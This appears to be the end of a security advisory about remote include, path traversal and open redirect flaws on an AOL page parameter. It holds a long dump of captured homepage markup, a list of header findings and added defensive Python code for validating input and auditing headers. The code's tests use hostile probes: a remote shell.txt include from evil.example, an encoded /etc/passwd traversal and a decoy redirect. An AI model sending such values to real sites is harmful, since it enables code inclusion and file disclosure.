<input type="hidden" id="header-s_it_r" value="comsearch"/>
<input type="hidden" id="header-s_it_f" value="comsearch"/>
<input type="hidden" id="header-s_it_s" value="comsearch"/>
<input type="hidden" id="header-initSmartSearch" value="false"/>
<input type="hidden" id="header-apiDictionary" value=""/>
<input type="hidden" id="header-initFocus" value="true"/>
<input type="hidden" id="header-preserveGhostText" value=""/>
<input type="hidden" id="header-ssExtraParams" value="s_qt=ac&s_chn=prt_aol20"/>
<input type="hidden" id="header-sExtraParams" value="s_chn=prt_aol20"/>
<input type="hidden" id="header-apiIt" value=""/>
<input type="hidden" id="header-apiUrl" value="http://autocomplete.search.aol.com/autocomplete/get"/>
<input type="hidden" id="header-apiCount" value="8"/>
<input type="hidden" id="header-apiQueryParam" value="q"/>
<input type="hidden" id="header-enableBestMatch" value="true"/>
<input type="hidden" id="header-bestMatchQuery" value="bm_chan=2&bm_max=1&bm_limit=4"/>
<input type="hidden" id="header-bestMatchPrefix" value="in"/>
<input type="hidden" id="header-bestMatchAction" value="http://search.aol.com/aol/tracking"/>
<fieldset>
<input class="" type="text" value="" id="aol-header-query" name="q" maxlength="150" title="Search the Web"/>
<input class="om_header-searchbutton lnid-sec2_lnk1" type="submit" value="Search" id="aol-header-search-button" onclick="omn.omo('header-searchbutton');" title="Search the Web"/>
<div id="aol-header-search-results"></div>
</fieldset>
</form>
</div></div>
<div id="user-menu-wrapper"><div class="mpid-4 ">
<div id="usrMnu" class="mnid-user-menu plid-559408 unauthenticated" hidedelay="200" showdelay="200">
<p class="username unauth">
<a href="https://my.screenname.aol.com/_cqr/login/login.psp?authLev=0&lang=en&locale=us&sitedomain=startpage.aol.com&siteState=OrigUrl%3Dhttp%253A%252F%252Fwww.aol.com%252F" class="lnid-sec1_lnk1">Sign In <span class="signindivider">|</span> Sign 

Up</a>

</p>
<ul class="usrSns">
</ul>
<div class="usrMnuLst mnid-user-menu plid-559408">
<div class="topLine"></div>
<ul>
<li><a class="lnid-sec2_lnk1" href="https://account.aol.com/account/settings/start">My Account</a></li><li><a class="makeHomepage url-http://www.aol.com/?mtmhp=txtlnkusaolp00000051&xicid=acm50options_mtmhp om-mtmhpGreetingIE lnid-sec2_lnk2" 

href="http://www.aol.com/?molhp=txtlnkusaolp00000051&icid=acm50options_mtmhp">Set AOL as Homepage</a></li></ul>

</div></div></div>
</div><div id="quick-nav-wrapper"><div class="mpid-5 ">
<div id="quick-nav-global_w">
<div id="quick-nav-global" quick-nav-icons="1" class=" quicknav quick-nav1">
<a class="mobile-search"><script pagespeed_no_defer="">//<![CDATA[
(function(){var 

d=window,e=document,f="documentElement",g="scrollTop",k="prototype",l="body",m="getAttribute",n="",p="1",q="data",r="img",s="load",t="number",u="on",v="onload",w="pagespeed_lazy_position",x="pagespeed_lazy_replaced_functions",y="pagespeed_lazy_src",z="po


sition",A="relative",B="resize",C="scroll",D="src";d.pagespeed=d.pagespeed||{};var E=d.pagespeed,F=function(a){this.d=[];this.a=0;this.b=!1;this.o=a;this.e=null;this.i=0;this.j=200;this.c=!1};

F[k].s=function(){var a=0;typeof d.pageYOffset==t?a=d.pageYOffset:e[l]&&e[l][g]?a=e[l][g]:e[f]&&e[f][g]&&(a=e[f][g]);var b=d.innerHeight||e[f].clientHeight||e[l].clientHeight;return{top:a,bottom:a+b,height:b}};F[k].n=function(a){var b=a[m](w);if(b)return 

parseInt(b,0);var b=a.offsetTop,c=a.offsetParent;c&&(b+=this.n(c));b=Math.max(b,0);a.setAttribute(w,b);return b};F[k].r=function(a){var b=this.n(a);return{top:b,bottom:b+a.offsetHeight}};

F[k].q=function(a,b){if(a.currentStyle)return a.currentStyle[b];if(e.defaultView&&e.defaultView.getComputedStyle){var c=e.defaultView.getComputedStyle(a,null);if(c)return c.getPropertyValue(b)}return a.style&&a.style[b]?a.style[b]:n};F[k].p=function(a){if(!

this.c&&(0==a.offsetHeight||0==a.offsetWidth))return!1;if(this.q(a,z)==A)return!0;var b=this.s(),c=a.getBoundingClientRect();c?(a=c.top-b.height,b=c.bottom):(c=this.r(a),a=c.top-b.bottom,b=c.bottom-b.top);return a<=this.a&&0<=b+this.a};

F[k].m=function(a){this.l(a);var b=this;d.setTimeout(function(){var c=a[m](y);if(null!=c)if((b.b||b.p(a))&&-1!=a.src.indexOf(b.o)){var h=a.parentNode,G=a.nextSibling;h&&h.removeChild(a);a.getAttribute=a.k;a.removeAttribute(v);a.removeAttribute

(y);a.removeAttribute(x);h&&h.insertBefore(a,G);a.src=c}else b.d.push(a)},0)};F[k].loadIfVisible=F[k].m;F[k].u=function(){this.b=!0;this.f()};F[k].loadAllImages=F[k].u;F[k].f=function(){var a=this.d,b=a.length;this.d=[];for(var c=0;c<b;++c)this.m(a[c])};

F[k].h=function(a,b){return a.a?null!=a.a(b):null!=a[m](b)};F[k].v=function(){for(var a=e.getElementsByTagName(r),b=0;b<a.length;++b){var c=a[b];this.h(c,y)&&this.l(c)}};F[k].overrideAttributeFunctions=F[k].v;F[k].l=function(a){var b=this;this.h(a,x)||(a.k=a

[m],a.getAttribute=function(a){a.toLowerCase()==D&&b.h(this,y)&&(a=y);return this.k(a)},a.setAttribute(x,p))};

E.g=function(a,b,c){if(a.addEventListener)a.addEventListener(b,c,!1);else if(a.attachEvent)a.attachEvent(u+b,c);else{var h=a[u+b];a[u+b]=function(){c.call(this);h&&h.call(this)}}};E.t=function(a,b){var c=new F(b);E.lazyLoadImages=c;E.g(d,s,function(){c.c=!

0;c.b=a;c.a=200;c.f()});0!=b.indexOf(q)&&((new Image).src=b);var h=function(){if(!(c.c&&a||c.e)){var b=c.j;(new Date).getTime()-c.i>c.j&&(b=0);c.e=d.setTimeout(function(){c.i=(new Date).getTime();c.f();c.e=null},b)}};E.g(d,C,h);E.g(d,B,h)};

E.lazyLoadInit=E.t;})();

pagespeed.lazyLoadInit(false, "/mod_pagespeed_static/1.JiBnMqyl6S.gif");


//]]></script><img class="noion" pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" alt="Search" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" 


onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/></a>

<b style="width: 49.0%;">
<a href="http://mail.aol.com/?icid=aol.com-nav" target="_blank" class="pausedl qnpos1 qn auth-0 mailpreview show-300 hide-300 thresh-500 mnid-qnav-mail_quick-nav-global plid-628891 lnid-sec1_lnk1" name="om_quicknav_mail_global" title='AOL Mail' 

id='mailpreview'><img alt="AOL Mail" class="noion" pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" 


onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/><span></span></a>

<div id="mailoverw"><div id="mailover"></div></div><div class="tooltip"><div class="tooltip-arrow sprite-bg sprite-up-arrow-tooltip"></div><i>AOL Mail</i></div></b>
<b style="width: 49.0%;">
<i class="last"><a href="#" onclick="return false;" class=" qnpos3 mnid-qnav-quick-nav-menu_quick-nav-global plid-559357 lnid-sec1_lnk3 hasdropdown dropdown-quick-nav-menu-icons" name="om_quicknav_quick-nav-menu_global"><img alt="" class="noion" 

pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/></a>

</i></b>
<a class="mobile-menu mnid-user-menu plid-559408"><img class="noion" pagespeed_lazy_src="http://portal.aolcdn.com/p5/forms/67023/xf5603f5b-bbc6-41bb-994d-91ca4e937f69.png.pagespeed.ic.q0cMAMNeSh.png" alt="Menu" 

src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/></a>

</div>
</div></div>
<div id="preview-container"></div></div></div>
<div id="aol-hnav">
<div class="mpid-7 ">
<div id="ghnav-wrapper" class="hnav_v2" data-group="">
<div id="ghnav1" class="mnid-hnav-2013-v2 plid-562160 format-light">
<ul class='topLevel'>
<li class='topLevel first'>
<div class='topTitle'><a id="ghnav-news" data-drawerslot="news" name="om_ghnav_sec1_link1" data-pos="1" class="itemLink icid-gnavbar_rootnews lnid-sec1_lnk1" href="/news/">News</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-sports" data-drawerslot="sports" name="om_ghnav_sec2_link1" data-pos="2" class="itemLink icid-gnavbar_rootsports lnid-sec2_lnk1" href="/sports/">Sports</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-entertainment" data-drawerslot="entertainment" name="om_ghnav_sec3_link1" data-pos="3" class="itemLink icid-gnavbar_rootentertainment lnid-sec3_lnk1" href="/entertainment/">Entertainment</a></div><div 

class='hnavdrawer'></div></li>

<li class='topLevel'>
<div class='topTitle'><a id="ghnav-lifestyle" data-drawerslot="lifestyle" name="om_ghnav_sec4_link1" data-pos="4" class="itemLink icid-gnavbar_living lnid-sec4_lnk1" href="/lifestyle/">Lifestyle</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-finance" data-drawerslot="finance" name="om_ghnav_sec5_link1" data-pos="5" class="itemLink icid-gnavbar_finance lnid-sec5_lnk1" href="/finance/">Finance</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-weather" name="om_ghnav_sec6_link1" data-pos="6" class="itemLink icid-gnavbar_weatherroot lnid-sec6_lnk1" href="http://weather.aol.com/">Weather</a></div><div class='hnavdrawer'></div></li>
<li class='topLevel'>
<div class='topTitle'><a id="ghnav-videos" name="om_ghnav_sec7_link1" data-pos="7" class="itemLink icid-gnavbar_rootvideo lnid-sec7_lnk1" href="http://features.aol.com/">Videos</a></div><div class='hnavdrawer'></div></li>
</ul>
<div class="ghnav-bg-top "></div>
<div class="ghnav-bg-sub "></div>
</div>
<div class="subnavControls dn " data-scrolldist="">
<div class="subnavcontroller"><span class="subnav-back sprite-bg sprite-grey-back-arrow-small bN"></span></div>
<div class="subnavcontroller"><span class="subnav-forward sprite-bg sprite-grey-forward-arrow-small bN"></span></div>
</div>
<span id="ghnavExtras" style="display:none;" class=" showDelay-600  hideDelay-400  stopDL-true "></span><div id="weather" class="wthrHnav light">
<div class="mpid-6 ">
<div class="weatherloc weatherloc-weather">
<div class="mnid-weather plid-500471">
<div class="locWrapper">
<a class="lnid-sec1_lnk3 weathersetloc" href="#" id="weatheredit">Set Location</a>
</div>
<span class="wthDvdr">|</span>
<a class="lnid-sec1_lnk2" href="http://weather.aol.com/main.adp?location=%locationId%" name="om_weatherforecast"><b class="wthr_ttl">Weather</b></a>
<a href="http://weather.aol.com/main.adp?location=%locationId%" class="lnid-sec1_lnk1" name="om_weathericon">
<!-- skyCode: 32 -->
<span title="Weather" class="icon-font-wthr icon-607" data-icon="&#xe607;"><span class="screen-reader-text">Weather</span></span>
<!--<img class="wthr_avatar" alt="Weather" title="Weather" src="http://portal.aolcdn.com/p5/_v116.7/css/whn/w32.png"/>-->
</a>
<div id="wthrChngLocDelay" class="dn">300</div>
<div class="ttip dn lnid-sec4_lnk1">
<div class="ttip-arw sprite-bg sprite-up-arrow-tooltip"></div>
<a href="#">Change Location</a>
</div>
<div class="chngLocTip"></div>
<script type="text/javascript" pagespeed_no_defer="">pagespeed.lazyLoadImages.overrideAttributeFunctions();</script><script type="text/javascript"></script></div>
</div></div>
</div>
<script type="text/javascript">var hnavDefaultHighlightLinkedText="today";</script>
</div></div>
</div>
<div id="aol-content" class="aol-content clearfix">
<div class="mlid-refresh-module">
<div class="mpid-1 resp-show1024 resp-hide">
<span id="pagerefresh-inactive" class="dn">1800,banner,pagerefresh-inactive-message</span></div>
</div>
<div id="col12_2">
<div class="mlid-dl_v2">
<script type="text/javascript">adSetInView('0');</script><div class="mpid-1 rfrsh rfrshs-dynamiclead rfrsho-false ">
<div id="dl_v2" class="wide typew dl_design_8 alternativeB fieldVersion8 " data-disableautoroate="">
<h2 class="hidden">Rotating Content</h2>
<a href="#" id="dlpBtnA" class="hidden" title="">Pause</a>
<div id="vdisplay-type" class="dn">:</div>
<div id="dlw">
<div id="dlwa">
<p id="dlSlt" class="dn">dynamiclead</p><i id="dlBtnTitle" class="dn">Pause Slideshow,Play Slideshow</i>
<span id="slduration" title="8000"></span>
<div class=" mnid-dl1 dtid-exclusiveStacked plid--289250805 dl-design-version-8 nonvideo-dl">
<span class="dn" id="dl-vslot">-289250805</span>
<a id="dlimg" data-orig-href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/" name="om_dl1_image" class="photo-link lnid-sec1_lnk1 icid-maing-grid7|main5|dl1|sec1_lnk1&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/"><img height="504" data-credit="AP" alt="At least 6 dead after grisly Amtrak train accident" width="768" class="noion" pagespeed_lazy_src="http://dlug-assets.grvcdn.com/15/38/6a/5a/f3/6c/37/53/f4/66/cc/ae/2c/3c/84/3b-118880845555531f7af1e8c4.28190042.jpg" src="/mod_pagespeed_static/1.JiBnMqyl6S.gif" onload="pagespeed.lazyLoadImages.loadIfVisible(this);"/><span id='dl-gradient-lr' class='dn'></span><span id='dl-gradient-rl' class='dn'></span></a><span class="dl-copy-overlay">
<div class="main-section ">
<span class="category"><a class="lnid-sec6_lnk1 icid-maing-grid7|main5|dl1|sec6_lnk1&amp;pLid=-289250805" href="http://www.aol.com/news/">News</a></span>
<span class="source"><a name="om_dl1_src" class="lnid-sec6_lnk2 icid-maing-grid7|main5|dl1|sec6_lnk2&amp;pLid=-289250805" href="http://www.aol.com">AOL</a></span>
<h2 class="dl-headline"><a name="om_dl1_hdln" class="lnid-sec1_lnk2 icid-maing-grid7|main5|dl1|sec1_lnk2&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/">At least 6 dead after grisly Amtrak train accident</a></h2>
<p class="dlcopy">A New York-bound train derailed violently near Philadelphia late Tuesday, injuring dozens and leaving a mangled 'disastrous mess.'</p>
<p class="lede-link"><a name="om_dl1_cpy" class="lnid-sec1_lnk3 icid-maing-grid7|main5|dl1|sec1_lnk3&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-flips-5-dead-140-injured/21182634/">Rescue crews still on the scene</a></p>
</div>
<div class="sublede-section">
<h3>Related coverage</h3>
<ul id="om_dl1_slde"><li class="first"><a name="om_dl1_slede1" class="dl-sublede-link bold  lnid-sec3_lnk3 icid-maing-grid7|main5|dl1|sec3_lnk3&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/the-latest-on-amtrak-crash-at-least-140-go-to-hospitals/21182681/" dldesignversion="dl-design-version-8">At least 140 sent to hospitals</a></li>
<li class=""><a name="om_dl1_slede2" class="dl-sublede-link bold  lnid-sec3_lnk4 icid-maing-grid7|main5|dl1|sec3_lnk4&amp;pLid=-289250805" href="http://www.aol.com/article/2015/05/13/amtrak-train-derails-in-philadelphia-killing-at-least-five/21182674/" dldesignversion="dl-design-version-8">Train's estimated speed before crash</a></li></ul>
</div>
</span>
</div>

<script> ************************************************************************************************************type="text/javascript" pagespeed_no_defer="">pagespeed.lazyLoadImages.overrideAttributeFunctions();</script><script type="text/javascript">var dlImps=new Array();dlImps["dl1"]=true;var dlact="";var dlduration=8000;var dloverrided=false;var dlresumeDuration=2000;var dlMobileDuration=-1;var dlcurr=1;var dltotal=40;var paramslot="dynamiclead";var dloffset=0;var ftmslot="dynamiclead-ftm";var ftmversion="3";var disableftm="true";var sitHot="";var vcslot="dynamiclead-video-config";var vbclass="vid_over";var stcExpTime=1200000;var dlItems="-289250805,1888649732,231816128,0,-799765327,-1748183507,-964184370,-441235404,1033204758,-1974669079,1064691091,57938518,814987171,-1119011898,1056167863,535331767,1103484987,-
***************************************************************
1105093385,1257960754";var dlSegSource="1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1";var dlCollectionId="";var dlRotCookieFlag="1";var dlRotCookieVal="main5%2C1431524902720%2CdlStickyBustTs%2C1427811308000%2C1%2C-
*************************************************************************
289250805%2C1%2C1888649732%2C1%2C231816128%2C1%2C0%2C1%2C-799765327%2C1%2C-1748183507%2C1%2C-964184370%2C1%2C-441235404%2C1%2C1033204758%2C1%2C-1974669079%2C1%2C1064691091%2C1%2C57938518%2C1%2C814987171%2C1%2C-1119011898%2C1%2C1056167863%2C1%2C535331767%2C1%2C1103484987%2C1%2C-849248534%2C1%2C-1802988545%2C1%2C781068958%2C1%2C435801538%2C1%2C-1585492377%2C1%2C-228869124%2C1%2C-193190208%2C1%2C1693120902%2C1%2C-5156796%2C1%2C1177620977%2C1%2C-1854162544%2C1%2C867933819%2C1%2C-1936511377%2C1%2C1567684778%2C1%2C-375679735%2C1%2C-1494422192%2C1%2C1498332623%2C1%2C51317826%2C1%2C-1439026932%2C1%2C-96746587%2C1%2C-370339251%2C1%2C-
************************************************************************
1105093385%2C1%2C1257960754";var dlRotCookieName="dlugRotn";var dlEnableSwipe=false;var dlNewDesign=true;var dlDesignVersion="8";var dlSlideCountDivider=" | ";var dlPauseButtonText="Pause";var dlPlayButtonText="Play";var cobrand="main5";var ftmPlid="";var dlPauseOnTabOut="false";var enableCSBeaconGlb=true;var dlug="true";var dlugGDK="*****************http://i.api.grvcdn.com/gdk/gdk-0.2.2-bare.min.js";var ***********dlugPlacement="1967";AOL.mobileDisableAutoRotate=true;AOL.tabletDisableAutoRotate=false;AOL.desktopDisableAutoRotate=false;</script>
******************************************************************************

</div> and more

</div> and more, and more, and much MORE :-)
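The dump above is what the vulnerable include handed back once the s_cu value was under the attacker's control. The block below is an added example, not part of this advisory and not AOL's code: it shows the hardened handling a developer would put in front of a parameter like s_cu for the three problems in the title (remote include, path traversal, URL redirect). The template directory INCLUDE_ROOT, the redirect allow-list ALLOWED_REDIRECT_HOSTS and the function names are assumptions chosen for illustration; only the parameter name s_cu comes from the advisory.

```python
"""Hardened handling of a user-controlled include/redirect parameter.

Added example; not AOL's code and not from the advisory. The parameter name
s_cu is the one the advisory reports. INCLUDE_ROOT, ALLOWED_REDIRECT_HOSTS
and the helper names are assumptions chosen for illustration.
"""
from pathlib import Path
from urllib.parse import unquote, urlsplit

# Assumed layout: includable templates live under this directory only.
INCLUDE_ROOT = Path("/var/www/app/templates").resolve()
# Assumed policy: redirects may leave the current page only for these hosts.
ALLOWED_REDIRECT_HOSTS = {"www.aol.com", "aol.com"}


def resolve_include(s_cu: str) -> Path:
    """Map s_cu to a template file inside INCLUDE_ROOT or raise ValueError.

    The vulnerable pattern behind CWE-98 is include(base + s_cu) with no
    checks: s_cu=http://evil.example/x pulls remote code (RFI) and
    s_cu=../../etc/passwd walks out of the template directory (traversal).
    """
    value = unquote(unquote(s_cu))  # collapse double URL-encoding first
    if "\x00" in value:
        raise ValueError("NUL byte in include parameter: %r" % s_cu)
    parts = urlsplit(value)  # raises ValueError itself on malformed hosts
    if parts.scheme or parts.netloc or value.startswith(("//", "\\\\")):
        raise ValueError("remote include refused: %r" % s_cu)
    # Resolve lexically, then insist the result is still under INCLUDE_ROOT;
    # this catches traversal without relying on a blacklist of "../" strings.
    candidate = (INCLUDE_ROOT / value.lstrip("/\\")).resolve()
    if candidate != INCLUDE_ROOT and INCLUDE_ROOT not in candidate.parents:
        raise ValueError("path traversal refused: %r" % s_cu)
    if candidate.suffix != ".html":
        raise ValueError("not a template: %r" % s_cu)
    return candidate


def include_is_refused(s_cu: str) -> bool:
    """True when resolve_include() rejects the value."""
    try:
        resolve_include(s_cu)
    except ValueError:
        return True
    return False


def safe_redirect_target(url: str, default: str = "/") -> str:
    """Return url if it is a same-site path or an allow-listed absolute URL,
    otherwise the safe default. This is the open-redirect half of the title."""
    value = unquote(url).strip()
    try:
        parts = urlsplit(value)
    except ValueError:
        return default
    if not parts.scheme and not parts.netloc:
        # A relative target must start with exactly one slash: browsers read
        # "//host" and "/\host" as scheme-relative URLs to another origin.
        if value.startswith("/") and not value.startswith(("//", "/\\")):
            return value
        return default
    # parts.hostname strips userinfo, so "https://www.aol.com@evil.example/"
    # is judged by evil.example, not by the decoy before the "@".
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_REDIRECT_HOSTS:
        return value
    return default


if __name__ == "__main__":
    for probe in ("news/index.html", "http://evil.example/shell.txt",
                  "//evil.example/shell.txt", "..%2F..%2Fetc%2Fpasswd"):
        outcome = "refused" if include_is_refused(probe) else resolve_include(probe)
        print("%-32s -> %s" % (probe, outcome))
    for probe in ("/news/", "//evil.example/", "https://www.aol.com@evil.example/"):
        print("%-36s -> %s" % (probe, safe_redirect_target(probe)))
```

The order matters: decode first, classify the value as remote or local with urlsplit, resolve the local candidate to a canonical path, and only then compare it against the allowed root. A filter that strips "../" from the raw string and then includes whatever is left is the pattern that keeps failing against double encoding and mixed separators.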







OTHER WEB DEVELOPMENT FAILS
***************************************




-Cookie Set Without Secure Flag (5)

-Incomplete or No Cache-Control and Pragma HTTP Header Set


-Private IP Disclosure (4)


-Web Browser XSS Protection Not Enabled (5967)


-X-Content-Type-Options Header Missing (6053)
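The five items above are all visible in a single captured response, so they can be checked without a scanner. The following is an added example, not from the advisory and not AOL's code: it parses a raw HTTP response and reports each of the five findings by the names used in the list. Both responses are constructed for the example; the first reproduces every finding, the second is the corrected form of the same response.

```python
"""Audit a captured HTTP response for the header and cookie findings listed
above (added example, not from the advisory or from AOL). WEAK_RESPONSE and
FIXED_RESPONSE are constructed inputs, not captures from any real site."""
import re

# RFC 1918 ranges; a match anywhere in the response is a private IP disclosure.
PRIVATE_IP = re.compile(
    r"\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}"
    r"|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}"
    r"|192\.168\.\d{1,3}\.\d{1,3})\b"
)

# Constructed sample: one cookie without Secure, weak caching, two private
# IPs (one in a header, one in an HTML comment), and the two missing headers.
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Cache-Control: max-age=0\r\n"
    "Set-Cookie: session=abc123; Path=/; HttpOnly\r\n"
    "Set-Cookie: prefs=en; Path=/; Secure\r\n"
    "X-Backend: 10.0.12.7\r\n"
    "\r\n"
    "<!-- served by 192.168.4.21 -->\r\n"
    "<html><body>hello</body></html>\r\n"
)

# Constructed fixed form of the same response.
FIXED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html; charset=utf-8\r\n"
    "Cache-Control: no-cache, no-store, must-revalidate\r\n"
    "Pragma: no-cache\r\n"
    "Set-Cookie: session=abc123; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Set-Cookie: prefs=en; Path=/; Secure\r\n"
    "X-XSS-Protection: 1; mode=block\r\n"
    "X-Content-Type-Options: nosniff\r\n"
    "\r\n"
    "<html><body>hello</body></html>\r\n"
)


def parse_response(raw: str):
    """Split a raw response into (status line, [(name, value), ...], body).
    Header names are lower-cased; duplicates such as Set-Cookie are kept."""
    head, _, body = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = []
    for line in lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status, headers, body


def audit(raw: str) -> list:
    """Return the findings for one response, in the order of the list above."""
    _, headers, body = parse_response(raw)

    def values(name):
        return [v for n, v in headers if n == name]

    findings = []
    # Each Set-Cookie is judged on its own attribute list.
    for cookie in values("set-cookie"):
        name = cookie.split("=", 1)[0]
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        if "secure" not in attrs:
            findings.append("Cookie Set Without Secure Flag: %s" % name)

    cache = ",".join(values("cache-control")).lower()
    pragma = ",".join(values("pragma")).lower()
    needed = ("no-cache", "no-store", "must-revalidate")
    if not all(d in cache for d in needed) or "no-cache" not in pragma:
        findings.append("Incomplete or No Cache-Control and Pragma HTTP Header Set")

    # Headers leak internal addresses as often as HTML comments do.
    searchable = body + "\n" + "\n".join(v for _, v in headers)
    for ip in sorted(set(PRIVATE_IP.findall(searchable))):
        findings.append("Private IP Disclosure: %s" % ip)

    xss = values("x-xss-protection")
    if not xss or not xss[0].startswith("1"):
        findings.append("Web Browser XSS Protection Not Enabled")

    if [v.lower() for v in values("x-content-type-options")] != ["nosniff"]:
        findings.append("X-Content-Type-Options Header Missing")
    return findings


if __name__ == "__main__":
    for line in audit(WEAK_RESPONSE):
        print(line)
    print("fixed response:", audit(FIXED_RESPONSE) or "no findings")
```

Two caveats for anyone re-running this today. The X-XSS-Protection header controls a browser filter that Chrome and Edge have since removed and Firefox never shipped, so its absence is no longer a defect in itself; Content-Security-Policy is the control that replaced it. And the Secure flag check only matters for cookies that carry session or preference state, which is why the audit names the cookie rather than just counting.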





V. AUTHORS
-----------


@Lord0fTheWar 

Red Teamer / @HabemusCurso Security Trainer

Red Teams / Tiger Teams Trainer at http://habemuscurso.blogspot.com





VI. LEGAL NOTICES
--------------------------

The author accepts no responsibility for any damage caused by the use or misuse of this information.




Lord0fthewar, ciao ciao ;)